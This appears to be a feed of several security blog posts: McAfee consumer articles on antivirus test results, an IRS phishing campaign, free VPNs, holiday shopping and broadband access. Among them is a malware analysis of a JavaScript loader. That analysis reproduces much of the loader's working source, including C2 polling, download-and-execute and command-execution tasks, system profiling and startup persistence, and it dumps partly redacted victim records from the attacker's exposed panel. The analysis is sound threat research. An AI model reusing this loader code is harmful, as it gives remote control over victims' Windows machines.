Putting Protection to The Test

McAfee win

Putting Protection to The Test

 This year has thrown a lot of challenges at us, and our digital lives were not immune. As millions of people around the world suddenly switched to working and learning online from home during the pandemic, digital threats spiked, making security and performance essential.

At McAfee, we are hyperaware of what our users are going through this year, with changes to their work, school, and lifestyles. At the same time, we are keeping our eyes on the threats aimed at taking advantage of the situation.

For example, we know that publicly disclosed security breaches increased by 41% in the first quarter of 2020 compared to the previous quarter. And, COVID-related threats are also on the rise. But with everything going on, it’s easy to see how technology users can become overwhelmed. That means that security not only has to protect against a wide range of threats, but also be seamless.

Security that Stands Strong

While you’ve been busy keeping up with all the changes this year has brought, we have been working on providing comprehensive security that protects you from existing and emerging threats so you can have peace of mind. In fact, Austria-based AV-Comparatives recently gave McAfee® Total Protection their highest three-star, “Advanced +” rating for malware protection measured against 16 competitors, and the German anti-malware test lab AV-Test awarded McAfee Total Protection with the TOP Product rating because of its 100% protection scores.

AV-Test also gave McAfee Mobile Security for Android its highest rating in terms of protection, performance, and usability against 14 competitors.

These labs also test for “false positives.” False positives happen when antivirus software identifies legitimate files or processes as malware by mistake.  In recent tests, our products have also scored well when it comes to avoiding false positives. AV-Test showed that McAfee Total Protection and McAfee Mobile Security flagged zero false positives during testing.

Both of these independent antivirus testing organizations specifically look for how well security products protect their users against various threats, which is critically important given today’s threat landscape.

Always Improving

One of the key ways we keep on top of threats is through continuous product development. We don’t stop working on our software tools just because they are released to the public. Our products are continuously updated with new features and enhancements when they become available because security isn’t static. Regardless of if you bought your product in 2019 or early 2020, we make sure that you have the latest protection installed through automatic product updates.

Underscoring our dedication to continual product improvement, U.K.-based SE Labs recently named McAfee the 2020 winner for “Best Product Development.”

SE Labs’s slogan is “testing like hackers” because it evaluates a product’s effectiveness at various stages of attacks, from malicious emails and keystroke loggers, to full-on network attacks and system harm. All of these assessments are important to ensure that we can protect our users in real-world settings.

Performance Still Matters

I’ve written before about how security software has to be convenient, and not get in the way of our productivity. Given the climate, it’s more important than ever that we offer comprehensive security tools that are lightweight and easy to manage.

For instance, I know how important these days are for my kids to meet with their teachers in online classes. If our security software was taking up so much of our computer’s resources that it kept them from being able to stream video while taking notes, it wouldn’t just be frustrating, but detrimental.

McAfee has consistently received some of the best scores in performance tests, while having a minimal impact on users’ systems. Just this month, AV-Comparatives awarded McAfee Total Protection the highest possible ADVANCED+ rating yet again, for the ninth time in a row!

This is great news for us, but even more important for our users since it shows that they do not have to sacrifice protection or performance, whether on their computers or mobile devices.

How It Helps You

Of course, we know the threat landscape is continuously evolving, and we need to evolve with it.

By offering you tools that can guard against the latest risks while allowing you to be productive and connect with family and friends, we hope to be a strong ally in your digital life. It’s great to see that these three independent testing organizations recognize our accomplishments so far in protection efficacy and performance. We promise to keep it up so you can live a carefree digital life.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Putting Protection to The Test appeared first on McAfee Blogs.

Threat Actor: Unkown

Today I’d like to share a quick analysis on a quite new and unknown threat spotted in the wild. The file which grabbed my attention is called Loader.js (md5: 59a03086db5ebd33615b819a7c3546a5) and if you wish you can download it from Yomi. A very similar (or maybe the same) threat has been observed in the past months from the @MalwareHunterTeam which published the following Tweet about it. Despite the nice tweet, the thread ended up without any further action or attribution (at least in my understanding).

So I decided to share some little knowledge about this sample and about the infrastructure on its back-end. The purpose of my post is to take a closer look to such a threat, without pretending to attribute or to name it.


The Javascript code is quite lean and it is shared in a clear text. No obfuscation techniques were involved in the current sample. The code is commented and the used syntax is punctual without contradictions during the file. Spaces, brackets, loops and variable assignments are clear, unique and always respectful of the file standards. Again no contradictions on syntax suggests the developer was an unique person which wrote the entire code without reuse or team swapping (or at least he spent much time to unify the syntax, which usually it makes not such a sense in the offensive world). The following code is a simple snip of what I meant by lean and respectful code syntax

// Loader version
var version = "OLD";

// Server
var server = "hxxp://93 .115. 21 .62/server/gate.php"; #modified by the blog author to avoid involuntary clik

// Interval between knocks in seconds
var interval = 181;

// How many times repeat failed task
var attemptsCount = 3;

// Status of running loader
var status = "Active";
// Path for download files
var wss = new ActiveXObject('WScript.Shell');
var defaultPath = wss.ExpandEnvironmentStrings('%APPDATA%');
var scriptFullPath = WScript.ScriptFullName;
var scriptName = WScript.ScriptName;
var fakeAutorunName = "MicrosoftOneDrive";
var shellObj = WScript.createObject("WScript.Shell");

// Connecting JSON module

// Collecting PC information
var clientInfo = GetClientInfo();

// Adding script to autorun

// Starting loader
while (status == "Active") {
    WScript.sleep(interval * 1000);

Initial section of the analyzed source code

The Javascript is made for acting in a Microsoft Windows environment, indeed it use classic execution techniques such as ActiveXObject running WScript.Shell against the victim system. The script per-se does not present innovative ways to execute code on machine and it looks like a quite simple but still effective software.

Main loop

The Javascript has a main loop to guarantee the correct execution. It is really straight forward by meaning it sends client information to command and control, it sleeps some seconds and finally it performs some tasks coming back from C2.

while (status == "Active") {
 WScript.sleep(interval * 1000);

Loader.js Main Loop

Both of the functions SendClientInfo() and SendKnock() have same styles. For example both of them instantiate a response variable which is returned and interpreted by DoTasks function.

function SendClientInfo() {
    var response;
    try {
        var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        var temp = WinHttpReq.Open("POST", server, false);
        WinHttpReq.SetRequestHeader("Content-Type", "application/json");
        WinHttpReq.SetRequestHeader("mode", "info");
        WinHttpReq.SetRequestHeader("uuid", clientInfo["uuid"]);
        WinHttpReq.SetRequestHeader("version", version);
        response = WinHttpReq.ResponseText;
    } catch (objError) {
        response = objError + "\n"
        response += "WinHTTP returned error: " + 
            (objError.number & 0xFFFF).toString() + "\n\n";
        response += objError.description;
    return response;

function SendKnock() {
    var response;
    try {
        var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        var temp = WinHttpReq.Open("POST", server, false);
        WinHttpReq.SetRequestHeader("Accept", "application/json");
        WinHttpReq.SetRequestHeader("mode", "knock");
        WinHttpReq.SetRequestHeader("uuid", clientInfo["uuid"]);
        WinHttpReq.SetRequestHeader("version", version);
        response = WinHttpReq.ResponseText;
    } catch (objError) {
        response = objError + "\n"
        response += "WinHTTP returned error: " + 
            (objError.number & 0xFFFF).toString() + "\n\n";
        response += objError.description;
    return response;

Very Clear Style, it looks like the TA won’t use false flags at all or messing around different code styles to emulate code reuse. The entire code looks like be a brand new code base, developed from scratch since no matches have been found.

C2 Communication

The command and control communication is made by the polling loop. The main loop periodically sends to C2 the client information and later it “knocks” to the server which sets up a response piggybacking a specific task to be performed on the victim. The following switch selector performs a simple — but still effective — backdoor, executing tasks on victims. The framework presents drop and execute capabilities, execution capabilities, assigned task monitoring and kill capabilities for blocking running taks.

       while ( (attempts > 0) && (result != 'True') ) {
            switch (tasks[task]["type"]) {
                case "Download & Execute":
                    result = DownloadAndExecute(tasks[task]["content"]);
                    if (result == 'False')
                        details = "Error: download or executing file failed";
                case "Execute":
                    result = Execute(tasks[task]["content"]);
                    if (result == 'False')
                        details = "Error: executing file failed";
                case "Terminate":
                    status = "Stopped";
                    result = 'True';
                    result = 'False';
                    details = "Error: unknown task type";
            if (result == 'False')
                details = "Success";
            SendTaskResult(tasks[task]["id"], result, details);

Switch on task type to perform actions on vitims

The most interesting functions (at least in my personal point of view) are the following ones: Download & Execute and Execute. The first one is used to spread other post exploitation frameworks to gain a more sophisticated control on the machine; for example a remote shell or a direct RDP connection. The second selector (Execute) is used to merely execute pure commands on the victim, it could be very useful to make some manual lateral movements or specific researches on the infected machine

Interesting to see that the switch function is protected against exceptions but the developer decided to not manage exceptions at all. For example taking a look to the following raw

result = DownloadAndExecute(tasks[task]["content"]);

it’s clear that the malware developer assumes that content exists in the tasks[task] section. Indeed if it does not exist an exception is raised but none is managing it. This is another distinctive decision made by the malware developer, which could be useful to attribution.

But one of the most interesting piece of software is in the way the developer (ab)use the WMI to extract information from local environment. In specific case we see UUID extraction

   // Retrieve UUID
    try {
        var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct"))
; !i.atEnd(); i.moveNext() )
        initInfo["uuid"] = i.item().UUID;
    } catch (err) {
        initInfo["uuid"] = 'N/A';

IP extraction, this time basing on

 // Retrieve client IP
    try {
        var ipReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        ipReq.Open("GET", "", false);
        ipRes = ipReq.ResponseText;
        initInfo["ip"] = ipRes.replace(/^\s+|\s+$/g, '');
    } catch (err) {
        initInfo["ip"] = 'N/A';

Country Extraction (based on IP)

    // Retrieve country
    try {
        var countryReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        countryReq.Open("GET", "", false);
        countryRes = countryReq.ResponseText;
        initInfo["location"] = countryRes.replace(/^\s+|\s+$/g, '');  
    } catch (err) {
        initInfo["location"] = 'N/A';

OS Name Extraction

 // Retrieve OS name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem")); !i.a
tEnd(); i.moveNext() )
        initInfo["os"] = i.item().Caption;
    } catch (err) {
        initInfo["os"] = 'N/A';

User Name and his Role Extraction

// Retrieve User name
    try {
        var shellObj = new ActiveXObject("WScript.Shell");
        var netObj = new ActiveXObject("WScript.Network");
        initInfo["user"] = netObj.ComputerName + '/' + shellObj.ExpandEnvironmentStrings("%USERNAME%");
    } catch (err) {
        initInfo["user"] = 'N/A';

    // Retrieve user role
    try {
        initInfo["role"] = "User";
        var groupObj = GetObject("WinNT://" + netObj.UserDomain + "/" + shellObj.ExpandEnvironmentStrings("%USERNAME%"))
        for (propObj in groupObj.Members)
            if (propObj.Name == "Administrators")
                initInfo["role"] = "Admin";
    } catch (err) {
        initInfo["role"] = 'N/A';

Antivirus installed Software Extraction

// Retrieve antivirus info
    try {
        var wmiAV = GetObject("winmgmts:root\\SecurityCenter2");
        for ( var i=new Enumerator(wmiAV.ExecQuery("SELECT * FROM AntivirusProduct")); !i.atEnd(); i.moveNext() )
            if (!initInfo["antivirus"])
                initInfo["antivirus"] = i.item().displayName;     
    } catch (err) {
        initInfo["antivirus"] = 'N/A';

CPU, GPU, RAM and Total Storage

    // Retrieve CPU name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_Processor")); !i.atEnd()
; i.moveNext() )
            initInfo["cpu"] = i.item().Name;
    } catch (err) {
        initInfo["cpu"] = 'N/A';

    // Retrieve GPU name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_VideoController")); !i.a
tEnd(); i.moveNext() )
            initInfo["gpu"] = i.item().Name;
    } catch (err) {
        initInfo["gpu"] = 'N/A';

    // Retrieve RAM
    try {
        var ramObj = WScript.CreateObject("Shell.Application");
        initInfo["ram"] = Math.round(ramObj.GetSystemInformation("PhysicalMemoryInstalled") / 
1048576) + ' MB';
    } catch (err) {
        initInfo["ram"] = 'N/A';
    // Retrieve total storage space
    try {
        var available = 0;
        var total = 0;
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_LogicalDisk")); !i.atEnd(); i.moveNext() ) {
            if (i.item().Size != null) {
                available += (i.item().FreeSpace / 1024 / 1024 / 1024);
                total += (i.item().Size / 1024 / 1024 / 1024);
        initInfo["storage"] = Math.round(available) + ' / ' + Math.round(total) + ' GB';
    } catch (err) {
        initInfo["storage"] = '0 / 0 GB';

Finally the attacker uses a net view to check if there are more PC on the network. If the function gets back some results, the attacker might decide to perform some manual lateral movements by introducing (through the download and execute command) a new Post exploitation framework.


The framework persistence and installation is performed by a simple entry in the autorun regkey as performed by the following function

function AddToAutorun() {
    try {
        startupPath = defaultPath + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
        fsObj = WScript.CreateObject('Scripting.FileSystemObject');   
        fsObj.CopyFile(scriptFullPath, startupPath);
    } catch (err) { return; }

AutoRun And Persistence

The defaultPath variable is previously set to wss.ExpandEnvironmentStrings('%APPDATA%'); so that the javascript is stored in the classic %APPDATA% folder which has the right user permissions and it gets executed on startup by the autorun registration.

External Resources

Another interesting point is in the way the attacker loads the external resources. In this script the developer uses the ImportJSON() which grabs the needed library online and then executes it through eval() statement. Again for the second time the attacker assumes that the library is reachable by the target PC, so the victim shall be placed in an environment where is not restricted. A simple way to block the execution of this loader in a wide infection scenario it would be to block the download of the json2.js library by filtering out the following url:

function ImportJSON() {
    var xObj = WSH.CreateObject('Microsoft.XMLHTTP'),
    fso = WSH.CreateObject('Scripting.FileSystemObject'),
    temp = WSH.CreateObject('WScript.Shell').Environment('Process')('temp'),
    j2lib = ''

    if (fso.FileExists(temp + '\\json2.js')) {
        j2lib = fso.OpenTextFile(temp + '\\json2.js', 1);
    else {
        with (xObj) {
            open("GET", j2lib, true);
            setRequestHeader('User-Agent', 'XMLHTTP/1.0');

        while (xObj.readyState != 4) WSH.Sleep(50);
        j2lib = fso.CreateTextFile(temp + '\\json2.js', true);

Command And Control Web Panel

By taking a closer look to the Command and Control server, available at the following address: "hxxp://93 .115. 21 .62/server/ ,we might see the attacker let the directory named server free to list its content. We can now enumerate the entire directory making some guess on how the Command and Control web panel would work.

C2 Server listing folder

Fortunately it looks like the panel does not check the login session correctly letting me free to query the single .php files even without any real credential. For example performing a simple HTTP GET request to the drawAntivirusesChart.php we get the following result.

  "data": [
      "name": "AhnLab V3 Lite",
      "count": 1
      "name": "Windows Defender",
      "count": 3
      "name": "Quick Heal Internet Security",
      "count": 1
      "name": "N\\/A",
      "count": 1
      "name": "SecureAPlus Antivirus",
      "count": 1
      "name": "Emsisoft Anti-Malware",
      "count": 1
      "name": "Webroot SecureAnywhere",
      "count": 1

So we are able to query the C2 and getting back results in order to estimate how wide is the current attack surface and how is the current victimology. So let’s start on understanding the attack range. It looks like the file printSummaryOverview.php would definitely help us in having a quick overview. So let’s query it and see how big the infection looks like.


We have actually a super small set of victims, maybe because they have been selected or maybe because it is an early stage threat (I would bet on the second hypothesis). By querying the printTopCountries.php I would expect to see target areas, indeed if you remember the Loader.js it checks from ipinfo the target country and location.


Sweet ! Now, what if we can query, in the same way, the endpoint named printClients.php ? Will it be a kind of database dump with the entire victimology ? Yes it is !

  "draw": 0,
  "recordsTotal": 9,
  "recordsFiltered": 9,
  "data": [
      "id": "2",
      "uuid": "18D68C6D-OMISSIS by Author",
      "ip": "115.69.OMISSIS by Author",
      "location": "IN",
      "os": "Microsoft Windows 8.1 Enterprise Evaluation",
      "user": "IE11W OMISSIS by Author/IEUser",
      "role": "N\\/A",
      "antivirus": "AhnLab V3 Lite",
      "cpu": "AMD A6-6310 APU with AMD Radeon R4 Graphics ",
      "ram": "4096 MB",
      "storage": "312 \\/ 465 GB",
      "network": "0",
      "added": "2020-11-21 17:50:58",
      "seen": "2020-11-21 18:05:48",
      "version": "OLD"
      "id": "3",
      "uuid": "032E02B4-OMISSIS by Author",
      "ip": "185.107.1OMISSIS by Author",
      "location": "RU",
      "os": "\\u041c\\u0430\\u0439\\u043a\\u0440\\u043e\\u0441\\u043e\\u0444\\u0442 Windows 10 Pro",
      "user": "DESK OMISSIS by Author H5\\/Admin",
      "role": "User",
      "antivirus": "Windows Defender",
      "cpu": "AMD Ryzen 5 PRO 3400G with Radeon Vega Graphics",
      "ram": "14284 MB",
      "storage": "535 \\/ 1009 GB",
      "network": "0",
      "added": "2020-11-21 22:35:17",
      "seen": "2020-11-21 22:38:18",
      "version": "OLD"
      "id": "4",
      "uuid": "67CDDC1F - OMISSIS by Author",
      "ip": "94.114.OMISSIS by Author",
      "location": "DE",
      "os": "Microsoft Windows 10 Pro",
      "user": "NQ OMISSIS by Author D1HVy",
      "role": "N\\/A",
      "antivirus": "Windows Defender",
      "cpu": "Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz",
      "ram": "4096 MB",
      "storage": "487 \\/ 511 GB",
      "network": "0",
      "added": "2020-11-21 23:48:48",
      "seen": "2020-11-21 23:48:48",
      "version": "OLD"
---- snip ----

  "debug": "SELECT `id`, `uuid`, `ip`, `location`, `os`, `user`, `role`, `antivirus`, `cpu`, `ram`, `storage`, `network`, `added`, `seen`, `version` FROM `clients` "

Quite interesting the debugging strings as well. They show us the database composition.

We now have all the information we need ! We really don’t care about the graphical UI, but if you are curious about the panel .CSS, well you are just few clicks away from it 😉

Unknown TA Dasboard


The sample Loader.js (available HERE) is a new kind of simple loader with basic functionalities of command and control. From the sample it has been possible to identify the command and control infrastructure and with some luck its functionalities. Fortunately the victimology is so small that makes me thinking about an early stage system or maybe an emerging threat still under development.

Staying safe while gaming: how to ensure your children don’t become victims of financial fraud

Protect your children from financial frauds when gamingIf you’re a parent and haven’t been in touch with gaming for a while, you’d be surprised at...

The post Staying safe while gaming: how to ensure your children don’t become victims of financial fraud appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.

70,000 Phishing Emails Sent Impersonating the IRS: How to Stay Protected

tracking apps

70,000 Phishing Emails Sent Impersonating the IRS: How to Stay Protected 

You wake up, log in to your Outlook, and find an email waiting in your inbox from Much to your confusion, the email claims that you have an outstanding account balance that you must pay immediately, or you will face legal charges.  

As it turns out, you’re not the only one to receive this message. According to Bleeping Computera phishing campaign was recently discovered impersonating the IRS, with 70,000 spoofed emails reaching users’ inboxes. Let’s unpack how this scheme works.  

Watch Out for Spoofed IRS Emails 

This scam targets Microsoft 365 users and threatens to press legal charges unless the recipient settles an outstanding account balance. And while some of the telltale signs of a phishing scam are grammar errors and misspellings throughout the body and address of the email, this threat is a little more sophisticated. To make this threat appear more credible, scammers use the email, causing recipients to believe that the email actually did originate from the IRS. The email also appears to have no spelling errors at first glance, further increasing its legitimacy to an unsuspecting user.  

This scam is not foolproof, however. Upon further investigation, a recipient would see that the email’s header reveals the real sending domain: What’s more, the reply-to field redirects the replies to instead of the IRS support mailing address. 

To further entice users into falling for this scheme, scammers threaten arrest or other legal charges and tell recipients that they will forward the emails to their employer to withhold the fake outstanding amounts from their wages. Additionally, the emails also instruct the targets to immediately reply with payment details to avoid having their credit affected.  

Send IRS Scammers Packing With These Security Tips  

 The best way to stay protected from phishing scams? Knowing how to spot them! Follow these security tips and best practices to prevent falling for fraudsters’ tricks:  

Go directly to the source 

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be cautious of emails asking you to act 

 If you receive an email or text asking you to download software or pay a certain amount of money, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links or forking over money unnecessarily. 

Hover over links to see and verify the URL 

 If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether. 

Change your password 

 If you accidentally respond to a phishing email with your personal data, change the passwords to any accounts you suspect may have been impacted. Make sure your new credentials are strong and unique from your other logins. For tips on how to create a more secure password, read our blog oncommon password habitsand how to safeguard your accounts.   

Consider using identity theft protection 

 A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.  

Stay Updated 

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post 70,000 Phishing Emails Sent Impersonating the IRS: How to Stay Protected appeared first on McAfee Blogs.

Keeping kids safe in the digital world: a primer for anxious parents

Keep your kids safe from digital threats!Like most things in life, starting early gives you an advantage, even when it comes to cybersecurity. Today’s...

The post Keeping kids safe in the digital world: a primer for anxious parents appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.

Free VPNs May Still Come with a Price

Strong passwords

Free VPNs May Still Come with a Price

If we’re being honest, many of us are consuming a lot of online content these days, whether it be for work, education, or sheer entertainment. I know my family is trying to balance what we need to do online, like meetings and classes, with fun activities like streaming movies, given that we are all spending more time safely at home.

But as a security professional what I’m really concerned about is how we are connecting to all this digital content. There has been a surge in VPN (virtual private network) downloads so far this year, showing that users are concerned about their online privacy, which is a good thing.

As you may know, a personal VPN is simply a piece of software that can establish a secure tunnel over the internet, offering you both privacy and freedom from IP-based tracking. It protects your identity and financial information by encrypting, or scrambling, the data that flows through the tunnel, and can mask your true location, making it appear as though you are connecting from somewhere else.

However, the myriad of VPN options—from free, to paid, to “freemium” (limited products offered on a trial basis for free, hoping customers will invest in more comprehensive, paid versions)—can be confusing and cause some customers to walk away unprotected. This is unfortunate, because here at McAfee we’ve recorded a growing number of network attacks, including targeted attacks against a variety of business and educational enterprises.

These threats mean that we need to do our best to ensure that our sensitive information stays safe, which is why I’d like to take a look at the difference between free VPNs and premium VPNs.

Sometimes a VPN is included in more robust security software, as it is in McAfee® Total Protection, but often it is a standalone tool, that is offered either at a monthly subscription rate, or for free. While it may be tempting to go for a free option, there are some serious considerations that you should take to heart.

Free VPNs – Risky Business

Since free VPNs are not making money directly from their users, many make revenue indirectly, through advertising. This means that not only are users bombarded with ads, they are also exposed to tracking, and potentially malware. In fact, one study of 283 free VPN providers found that 72% included trackers. This is not that surprising, given that advertisers depend on gathering your personal data to better target their ads.

But beyond the frustration of ads, slowness, and upgrade prompts is the fact that some free VPN tools include malware that can put your sensitive information at risk. The same study found that 38% of the free VPN applications in the Google Play Store were found to have malware, such as keyloggers, and some even stole the data off of users’ devices.

Also concerning is how these free providers handle your data. In one worrying incident, a VPN provider exposed thousands of user logs and API access records openly on the web, including passwords and identity information.

Privacy Worth Paying For – Paid VPN Benefits

VPNs are critical tools for enhancing our privacy and shouldn’t be an avenue for potentially opening the door to new risks. That’s why I always advise users to look for a paid VPN with the following features:

Unlimited Bandwidth —You want your network connection to stay secured no matter how much time you spend online.

Speedy Performance—We all know how frustrating a sluggish internet connection can be when you are trying to get things done. Whether connecting for productivity, education, or entertainment, we are all dependent on bandwidth. That’s why it’s important to choose a high-speed VPN that enhances your privacy, without sacrificing the quality of your connection.

 Multiple Device Protection—These days many of us toggle between mobile devices, laptops, and computers, so they should all be able to connect securely.

 Less Battery Drain—Some free mobile VPNs zap your battery life, making users less likely to stay protected. You shouldn’t have to choose between your battery life and safeguarding your privacy.

 Ease of Use— As I’ve written recently, for technology to really work it has to be convenient. After all, these technologies should power your connected life, not serve as a hindrance.

Fortunately, we don’t have to sacrifice convenience, or pay high prices, for a VPN that can offer a high level of privacy and protection. A comprehensive security suite like McAfee Total Protection includes our McAfee® Safe Connect standalone VPN with auto-renewal and takes the worry out of connecting, so you can focus on what’s important to you and your family, and enjoy quality time together.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Free VPNs May Still Come with a Price appeared first on McAfee Blogs.

‘Sleigh’ Holiday Shopping by Protecting Your Online Security

Holiday Shopping Online

‘Sleigh’ Holiday Shopping by Protecting Your Online Security

And just like that, the holiday shopping season is among us! Like consumers everywhere, you may be trying to plan ahead when it comes to picking out gifts for your friends and family, scouring far and wide to cross items off your list. This year, however, will likely be different than past holiday shopping seasons.

While more than 124 million consumers shopped in-store during the 2019 holiday shopping weekend, findings from McAfee’s 2020 Holiday Season: State of Today’s Digital e-Shopper survey revealed that consumers plan to do more shopping online – and earlier – this holiday season. But how will this increase in online activity impact users’ digital lives?

Let’s explore what this online shopping trend means for consumer security this holiday shopping season.

Gearing Up For Shopping Season? So Are Holiday Hackers

The onset of the global health emergency caused users everywhere to live, work, play, and buy through their devices – maybe more than ever before. McAfee’s survey shows that general shopping activity has increased, with 49% of respondents stating they are buying online more since the onset of COVID-19. As one could predict, researchers expect these online shopping habits to bleed into the holiday shopping season. In fact, 36% of Americans note that they plan on using digital links to give gifts and spread cheer this year. However, this increase in online activity doesn’t exactly mean an increase in online safety.

Hackers love to take advantage of online trends, so it’s no surprise that they see an increase in online activity as more opportunities to spread threats.  In fact, McAfee Labs observed an almost 12% increase in online threats per minute in Q2 2020 compared to the previous quarter.

Increased online activity serves as the perfect opportunity for hackers to interrupt consumers’ merriment and spread malicious misdeeds.  And 36% of consumers noted that their online buying habits will increase this holiday season, even though they are aware of cyber risks.  This lack of concern is troublesome, especially as hackers get stealthier in how they scam consumers. Take Black Friday and Cyber Monday discounts, for example. Forty-three percent of survey respondents admitted to not checking the authenticity of these so-called deals when going through their emails and text messages. By not taking proper security precautions, users potentially open themselves up to a blizzard of cyberthreats.

Holiday Shopping Scams
The 2020 e-Shoppers Guide

Spread Holiday Cheer Without Fear

While these survey results confirm that cyber-grinches are using their tricks to interrupt the merriment, that doesn’t mean consumers can’t still have a holly, jolly shopping experience. By taking the necessary steps to protect themselves – and their loved ones – this holiday season, consumers can continue to live their digital lives with confidence. To help ensure hackers don’t put a damper on your festive celebrations, follow these security tips:

Employ multi-factor authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers.

Go directly to the source

Instead of clicking on a link in an email or text message, it’s always best to check directly with the source to verify a Black Friday or Cyber Monday offer or track a package’s shipment.

Browse with caution

Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.

Protect your identity

Hackers often use consumers’ personally identifiable information to make fraudulent purchases – a trick that would certainly interrupt a holiday shopping spree. A solution like McAfee Identity Theft Protection takes a proactive approach to help protect identities with personal and financial monitoring and recovery tools to help keep identities personal and secure.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post ‘Sleigh’ Holiday Shopping by Protecting Your Online Security appeared first on McAfee Blogs.

Thankful for broadband internet, and hopeful for much more  

Using broadband internet

Thankful for broadband internet, and hopeful for much more  

 Where would we be without our internet this year? 

We’ve shoppedworkedstudied and taughtjob huntedand cared for each other online this year in ways we haven’t before—not to mention entertained ourselves plenty too. As so many of us have faced challenges and outright adversity this year, it’s difficult to imagine what this year would have been like without the support of a reliable broadband internet connection. So much so, you can argue that it’s become a necessity.  

For that, I’m thankful—and recognize that we have a long way to go before all of us can share in those same thanks. As I’ve mentioned in earlier blogs, fixed broadband internet access at home remains elusive for many. In the U.S. alone, one analysis shows that more than 150 million people do not use the internet at broadband speeds, which is practically half of the U.S. population. 

What is broadband internet? 

A good question to ask here is what exactly constitutes “broadband?” The Federal Communications Commission (FCC) defines broadband speeds as 25 Megabits per second (Mbps) of download speed and 3 Mbps of upload speed. (Note that the FCC estimates only 21 million people in the U.S. are without broadbanda number widely considered to be low.) 

Put in everyday terms, 25 Megabits per second of download speed is baseline figure that should provide a family of two to four people with enough capacity to engage in bandwidth-hungry activities like working from home, schooling online, or even receiving medical care through telemedicine, along with streaming to stay entertained and informed too. 

As we look at that figure of 150 million underserved people, we see people who live in remote areas that simply aren’t wired for broadband yetrepresenting millions of rural residents and people living on tribal lands. Additionally, it also includes people in urban areas who potentially have access to a broadband connection, yet their income levels impact their ability to subscribe to it. 

Obviously, a major hurdle in rolling out broadband nationwide is the 1.9 billion acres that makes up our country. The physical, technological, and financial efforts associated with building fixed broadband access across rural and remote terrain are substantial to say the least. Additionally, there are regulatory matters as well, like the rules that govern access to existing utility poles and conduits needed for broadband deployment. 

Broadband is no longer a luxury, it’s a utility 

Ultimately, we’re talking about connecting not just homes, but entire communities—people, businesses, libraries, granges, local government, and more. Getting them access to broadband isn’t just a commercial interest, it’s a matter of infrastructure as well. Just as water and electricity are utilities, we can argue that the internet, broadband internet, has long since evolved into a utility. The reasons are clear: education, economic growth, employment and even access to healthcare all stand to improve when broadband is available to a community, as has been seen in communities such as Chattanooga, Tennessee and in Delta County, ColoradoThus it makes sense that connecting them has become a joint endeavor by the public and private sector. 

Meanwhile, last summer, the lack of adequate broadband across Nebraska during the pandemic prompted the state’s governor and legislature to allocate pandemic relief funds and pass bills that would speed the deployment of broadband across the state. As reported by the Omaha World-Heraldone of Nebraska’s rural power district managers said of fixed broadband service“It goes beyond economic development, it goes beyond watching Netflix, there’s some real business implications here.” 

However, even in communities where broadband is physically available, pockets of low-speed connectivity exist as well. According to the Pew Research Center, only 53 percent of adults with an income under $30,000 had broadband access at home. For those with an income of between $30,000 and $100,000, that figure takes a major leap up to 81%. Instead, lower-income Americans turn to their smartphones for all their internet access. From the findings: 

As of early 2019, 26% of adults living in households earning less than $30,000 a year are “smartphone-dependent” internet users–meaning they own a smartphone but do not have broadband internet at home. In contrast, only 5% of those living in households earning $100,000 or more fall into this category in 2019. 

Smartphones alone aren’t enough 

What does a smartphone-only internet life might look like? Pew Research Center put that into perspective in a survey where respondents were asked about job hunting on the internet. Some 32of people with a reported household income of under $30,000 said that they submitted a job application by phone. For those households making more than $75,000, that figure was just 7%. (Cost is certainly a factor, yet it is encouraging to see that the reported average cost of broadband in the U.S. is dropping—down to $50 a month from just over $67 a month a year ago.) 

That’s just one example of a smartphone-only internet, yet you can imagine how difficult it must be to create a resume, complete schoolwork, or work remotely when your internet experience is limited to the small screen of a phone. Contrast that with this year’s need to work and study at home. A low-income household that’s dependent on smartphones misses out. Their internet is a less useful and less productive internet experience. They simply can’t work, learn, and train at home like fully connected households can. 

The road to broadband for all 

My hope in sharing this issue with you is so that we can all gain a bit of perspective. Far fewer people have access to a broadband internet experience than we might initially think, which results in a lack of connectivity that stunts the benefits and opportunities they and their communities can realize. 

Granted, the solution for increasing broadband access largely rests with state-level broadband offices, budgeting and legislation at the federal government level, along with public partnerships and interest groups who are all pushing for improved broadband access. (And, in the states which allow it, municipal broadband solutions.) However, as individuals, we can let this reality shape some of our decision-making on a local level.  

